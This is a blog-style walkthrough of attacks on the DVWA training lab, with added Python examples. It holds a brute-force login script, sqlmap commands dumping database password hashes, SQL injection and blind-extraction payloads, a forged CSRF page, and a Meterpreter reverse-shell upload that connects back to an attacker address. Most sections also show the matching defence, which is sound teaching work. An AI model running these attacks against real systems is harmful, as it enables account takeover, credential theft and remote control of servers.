Wednesday 1 June 2011

DVWA

Brute Force

Brute forcing is a term for what is essentially a trial-and-error process: guessing an application's or service's username and/or password until one works. There are many tools around to automate this for different applications and services.
The DVWA Brute Force section has an HTML login form where you can practise brute-force username/password attacks.
I'm going to demonstrate this with FireForce, a Mozilla Firefox plugin that can brute-force GET or POST forms.
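The same attack scripted, as an added example (not part of the original post and not FireForce's code). It assumes DVWA is at the lab address used later in the post, that the Brute Force page takes its guesses as the GET parameters username, password and Login and prints "Welcome to the password protected area" on a correct guess, and that you replace the placeholder PHPSESSID with your own; the wordlists are constructed.

```python
"""Dictionary attack against the DVWA 'Brute Force' login form (security=low).

Added example, not the original post's FireForce demo. Assumptions: DVWA at
BASE_URL, a GET form with username/password/Login parameters, SUCCESS_MARKER
in the body on a correct guess, and a real PHPSESSID in place of REPLACE_ME.
"""
import urllib.parse
import urllib.request

BASE_URL = "http://10.50.60.116/dvwa/vulnerabilities/brute/"  # lab host from the post
COOKIE = "PHPSESSID=REPLACE_ME; security=low"                 # copy from the browser
SUCCESS_MARKER = "Welcome to the password protected area"      # DVWA's success text

# Constructed wordlists; in practice point these at real wordlist files.
USERS = ["admin", "gordonb", "1337"]
PASSWORDS = ["letmein", "password", "charley"]


def build_url(username, password):
    """Build the GET request DVWA's form submits, one guess per request."""
    query = urllib.parse.urlencode(
        {"username": username, "password": password, "Login": "Login"}
    )
    return f"{BASE_URL}?{query}"


def http_attempt(username, password):
    """Send one guess with the authenticated session cookie; return the body."""
    req = urllib.request.Request(build_url(username, password),
                                 headers={"Cookie": COOKIE})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def brute_force(attempt, users=USERS, passwords=PASSWORDS):
    """Try every user/password pair via attempt(user, pw); return the hits.

    attempt is injected so the loop can be exercised without a live target.
    """
    hits = []
    for user in users:
        for pw in passwords:
            body = attempt(user, pw)
            if SUCCESS_MARKER in body:
                hits.append((user, pw))
                break  # one valid password per user is enough; move on
    return hits


if __name__ == "__main__":
    for user, pw in brute_force(http_attempt):
        print(f"[+] {user}:{pw}")
```

The cookie matters: without a valid PHPSESSID the page redirects to the DVWA login and every guess looks like a failure. The low level has no lockout or delay, which is why a plain loop works; at higher DVWA levels the form adds failure delays and an anti-CSRF token, so each guess would first have to fetch the form and extract the token.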
Here's a small demo of it in action:


SQL Injection

SQL Injection is a technique for pushing SQL through an application's front end so that the database executes it; the vulnerability occurs when a programmer builds queries by concatenating user input without escaping or parameterising it, so metacharacters such as a single quote typed into an input field change the structure of the SQL statement instead of being treated as data.
There are many ways to defeat the SQL Injection section of DVWA. I used SQLMap and the Tamper Data Firefox plugin.
Fire up DVWA, log in with admin / password and set the security level to low.
Open the SQL Injection section and submit the value 1 to get a baseline response.
You should see output below the form as follows:
ID: 1
First name: admin
Surname: admin
The id parameter is clearly feeding a database lookup. To confirm it is injectable before reaching for a tool, submit a single quote (') on its own: at the low level this produces a MySQL syntax error, because the quote closes the string literal around the id value and the rest of the query no longer parses.
Now open the Tamper Data plugin and click Start Tamper. Click the SQL Injection link in the menu again (this resets the form), enter 1 once more and click Submit. In Tamper Data, copy the whole Cookie header, including PHPSESSID and the security=low value, and paste it into Kate or another text editor; while it is open, make a note of the request URL as well. You'll see why in a second.
Next, open a terminal, cd to your SQLMap directory and start building your command line; here's what I used.
python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --dbs
I'll break this down for you:
-u the URL of the vulnerable page, with the id parameter in place
--cookie the cookie you copied from Tamper Data, which carries both your session and the security level (without it sqlmap is redirected to the login page and tests the wrong thing)
--string the text sqlmap expects to see in the response when an injected condition is true (here "Surname"); its presence or absence is the oracle sqlmap uses for boolean-based blind injection
--dbs enumerate the DBMS databases
This should give you output similar to this:
    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:38:12

[10:38:13] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:38:13] [INFO] resuming string match 'Surname' from session file
[10:38:13] [INFO] resuming injection point 'GET' from session file
[10:38:13] [INFO] resuming injection parameter 'id' from session file
[10:38:13] [INFO] resuming injection type 'stringsingle' from session file
[10:38:13] [INFO] resuming 0 number of parenthesis from session file
[10:38:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:38:13] [INFO] testing connection to the target url
[10:38:13] [INFO] testing for parenthesis on injectable parameter
[10:38:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:38:13] [INFO] fetching database names
[10:38:13] [INFO] fetching number of databases
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 3
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': information_schema
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': dvwa
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': mysql
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[10:38:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:38:13
Brilliant! You have enumerated the three database names: dvwa, information_schema and mysql. (The "resuming ... from session file" lines show this output is from a second run; the first time through, sqlmap spends a while probing the id parameter before it reports the injection type.) Now let's see if we can get some usernames and password hashes.
Here's the syntax I used:
python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --users --passwords
The only differences here are:
--users, which enumerates the DBMS users, and --passwords, which dumps their password hashes
You should get output similar to this:
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:39:09

[10:39:10] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:39:10] [INFO] resuming string match 'Surname' from session file
[10:39:10] [INFO] resuming injection point 'GET' from session file
[10:39:10] [INFO] resuming injection parameter 'id' from session file
[10:39:10] [INFO] resuming injection type 'stringsingle' from session file
[10:39:10] [INFO] resuming 0 number of parenthesis from session file
[10:39:10] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:39:10] [INFO] testing connection to the target url
[10:39:10] [INFO] testing for parenthesis on injectable parameter
[10:39:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:39:10] [INFO] fetching database users
[10:39:10] [INFO] fetching number of database users
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 4
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'localhost'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'dojo-vm'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'127.0.0.1'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:39:10] [INFO] fetching database users password hashes
[10:39:10] [INFO] fetching number of password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[10:39:10] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[10:39:10] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:39:10
Excellent! Now you have the password hashes for root and debian-sys-maint. The leading * marks these as MySQL 4.1+ hashes (SHA-1 of SHA-1 of the password), so feed them to your favourite password cracker in its MySQL 4.1/SHA-1 mode; the hashes are not decrypted, they are cracked by guessing. Note that these are the MySQL server's own accounts, not the web application's users: the DVWA logins and their MD5 hashes live in the users table of the dvwa database, which sqlmap will pull with -D dvwa -T users --dump.
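To see what sqlmap was doing underneath, here is the injection worked by hand, as an added example (not the post's code and not DVWA's). It rebuilds DVWA's users table in an in-memory SQLite database with constructed rows and reproduces the low-level query shape, SELECT first_name, last_name FROM users WHERE user_id = '$id', concatenating the id straight into the SQL; SQLite wants -- as the comment terminator where MySQL would also take #. The blind extraction function is the loop that sqlmap's --string oracle drives.

```python
"""DVWA-style SQL injection by hand: tautology, UNION dump, boolean-blind
extraction, and the parameterised query that stops all three.

Added example. The users table and its rows are constructed; MD5 hashes
because that is how DVWA stores application passwords.
"""
import hashlib
import sqlite3

SUCCESS_MARKER = "Surname"  # the word sqlmap's --string keyed on


def make_db():
    """Constructed stand-in for dvwa.users: two rows, MD5 password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    rows = [(1, "admin", "admin", "admin", "password"),
            (2, "Gordon", "Brown", "gordonb", "abc123")]
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(i, f, l, u, hashlib.md5(p.encode()).hexdigest()) for i, f, l, u, p in rows])
    return conn


def lookup_vulnerable(conn, user_id):
    """The DVWA-low shape: the id is concatenated, so it can rewrite the query."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised: the id is bound as a value and never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()


def render(rows):
    """Mimic the page output so the --string oracle is visible."""
    return "".join(f"First name: {f}\nSurname: {l}\n" for f, l in rows)


def page_says_true(conn, payload):
    """Boolean oracle: does the rendered page still contain 'Surname'?"""
    return SUCCESS_MARKER in render(lookup_vulnerable(conn, payload))


def extract_blind(conn, subquery, length=32, alphabet="0123456789abcdef"):
    """Pull the result of subquery one character at a time through the oracle,
    the way sqlmap does when all it has is a true/false signal."""
    out = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = f"1' AND substr(({subquery}),{pos},1)='{ch}"
            if page_says_true(conn, payload):
                out += ch
                break
        else:
            break  # no candidate matched: end of the value
    return out


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1' OR '1'='1"))                                 # every row
    print(lookup_vulnerable(db, "' UNION SELECT user, password FROM users-- "))  # hashes
    print(page_says_true(db, "1' AND '1'='1"), page_says_true(db, "1' AND '1'='2"))
    print(extract_blind(db, "SELECT password FROM users WHERE user='admin'"))
    print(lookup_safe(db, "1' OR '1'='1"))                                       # nothing
```

The UNION payload is the fast path when the page echoes query results, as DVWA does; the blind loop is what you fall back to when it does not, and it is why sqlmap asked for a --string: each request only tells it whether "Surname" was still on the page.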
Here's a short video showing how I did it:



CSRF

First of all I'd like to describe Cross-Site Request Forgery. This is not a new thing, it is a technique that has been around for many years, and it is also known as session riding in the black hat world. In a CSRF attack the attacker gets the victim's browser to send a request that the application accepts as a legitimate action by the "trusted", already-authenticated user. Unlike what I like to call its cousin, XSS (Cross-Site Scripting), CSRF exploits the trust a site has in a user's browser rather than the trust a user has in a particular site.
Tonight I will be attacking the CSRF section of DVWA.
I'll be using Firefox, FireBug, FoxyProxy, OWASP's CSRFTester and good ol' Kate, all available in the awesome Back|Track 4.
I'll capture a genuine HTTP request to change the password, using CSRFTester and FoxyProxy, then edit the captured request from GET to POST with Kate to build the proof of concept. I'll then open this edited page in Firefox and forge a password-change request to the web application.
During the password change I'll edit the page with FireBug to show the password changing.
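The forgery and the fix side by side, as an added example (not the post's CSRFTester walkthrough and not DVWA's code). The handler is a constructed stand-in for DVWA's low-level CSRF page, which changes the password from the GET parameters password_new, password_conf and Change; the target URL reuses the lab host from earlier in the post, and the Session class and its user_token field are stand-ins for the server-side session.

```python
"""CSRF against a password-change handler: the forged page, the handler that
falls for it, and the handler that does not.

Added example. Session, change_password_* and the user_token name are
constructed stand-ins, not DVWA's implementation.
"""
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

TARGET = "http://10.50.60.116/dvwa/vulnerabilities/csrf/"  # lab host from the post


def forged_url(new_password):
    """The password-change request exactly as the victim's browser would send
    it, using the parameter names DVWA's CSRF form submits."""
    return TARGET + "?" + urlencode(
        {"password_new": new_password, "password_conf": new_password, "Change": "Change"})


def forged_page(new_password):
    """Attacker-hosted page: a hidden image fetch fires the request with the
    victim's DVWA cookies attached, no click required."""
    return ('<html><body><img src="' + html.escape(forged_url(new_password), quote=True)
            + '" width="0" height="0"></body></html>')


class Session:
    """Constructed stand-in for the server-side session of a logged-in user."""
    def __init__(self, user):
        self.user = user
        self.password = "password"
        self.token = secrets.token_hex(16)  # per-session anti-CSRF token


def change_password_vulnerable(session, url):
    """DVWA-low style handler: any request carrying the session cookie is
    trusted, whichever site caused the browser to send it."""
    q = parse_qs(urlsplit(url).query)
    if q.get("password_new") and q.get("password_new") == q.get("password_conf"):
        session.password = q["password_new"][0]
        return True
    return False


def change_password_hardened(session, method, params):
    """Requires POST plus a token only the genuine form could have embedded;
    the attacker's page cannot read the token cross-origin to copy it."""
    if method != "POST":
        return False
    if not hmac.compare_digest(params.get("user_token", ""), session.token):
        return False
    new, conf = params.get("password_new"), params.get("password_conf")
    if not new or new != conf:
        return False
    session.password = new
    return True


if __name__ == "__main__":
    victim = Session("admin")
    print(forged_page("owned"))
    print(change_password_vulnerable(victim, forged_url("owned")), victim.password)
```

Accepting the change over GET is what makes the img tag sufficient, but switching the form to POST alone is not a fix, since a hidden auto-submitting form forges a POST just as easily (that is what CSRFTester generates); the control is the per-session token, compared in constant time, that a cross-origin page cannot obtain.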



Upload Exploitation
In this video I'll create a PHP payload with msfpayload:
msfpayload php/meterpreter/reverse_tcp LHOST=10.50.60.161 LPORT=8080 R > connectback.php
I'll also edit connectback.php to remove the "safety latch", the # on line 1.
Then set up Metasploit to handle the reverse connection:
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.50.60.161
set LPORT 8080
exploit
I'll then use the Upload section of DVWA to upload the payload, check the page source for the path it was saved to, browse to the upload directory http://10.50.60.193/dvwa/hackable/uploads and execute connectback.php.
This will give me a Meterpreter session on the DVWA box as the www-data user (Apache).
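Why the upload goes through, as an added example (not DVWA's code and not the post's). Three constructed accept functions stand in for upload handlers: one with no checks, which is the level the walkthrough exploits; one that trusts the client-supplied Content-Type, as many naive filters (DVWA's medium level among them) do; and a hardened one. The PHP bytes are a stub standing in for the msfpayload output, and the directory name follows the post.

```python
"""Three upload filters against the same attacker file.

Added example. PHP_UPLOAD and JPEG_UPLOAD are constructed; the accept_*
functions are illustrative, not DVWA's source.
"""
import posixpath
import secrets

UPLOAD_DIR = "hackable/uploads"  # the directory the post browses to
# Extension allowlist with the magic bytes each type must start with.
ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}

# Constructed attacker upload: PHP inside, but the Content-Type header is
# whatever the attacker put in the multipart request (Tamper Data, curl -F).
PHP_UPLOAD = {"filename": "connectback.php", "content_type": "image/jpeg",
              "data": b"<?php /* stand-in for the msfpayload output */ ?>"}
# Constructed benign upload.
JPEG_UPLOAD = {"filename": "cat.jpg", "content_type": "image/jpeg",
               "data": b"\xff\xd8\xff\xe0" + b"\x00" * 16}


def accept_no_checks(upload):
    """DVWA low: stored under its original name, no questions asked."""
    return posixpath.join(UPLOAD_DIR, upload["filename"])


def accept_content_type_only(upload):
    """Trusts the client-supplied Content-Type, which the attacker controls."""
    if upload["content_type"] not in ("image/jpeg", "image/png"):
        return None
    return posixpath.join(UPLOAD_DIR, upload["filename"])


def accept_hardened(upload):
    """Extension allowlist, magic-byte check, and a server-chosen file name
    so the client can never pick a .php (or any other) extension."""
    ext = posixpath.splitext(upload["filename"])[1].lower()
    if ext not in ALLOWED or not upload["data"].startswith(ALLOWED[ext]):
        return None
    return posixpath.join(UPLOAD_DIR, secrets.token_hex(8) + ext)


if __name__ == "__main__":
    for name, accept in [("no checks", accept_no_checks),
                         ("content-type only", accept_content_type_only),
                         ("hardened", accept_hardened)]:
        print(f"{name}: php -> {accept(PHP_UPLOAD)}, jpeg -> {accept(JPEG_UPLOAD)}")
```

Even the hardened version still accepts a JPEG with PHP appended after valid magic bytes, so the file checks only narrow the attack; what actually breaks the walkthrough is that a stored file can never get a .php name, and that the upload directory is served without the PHP handler so nothing in it executes.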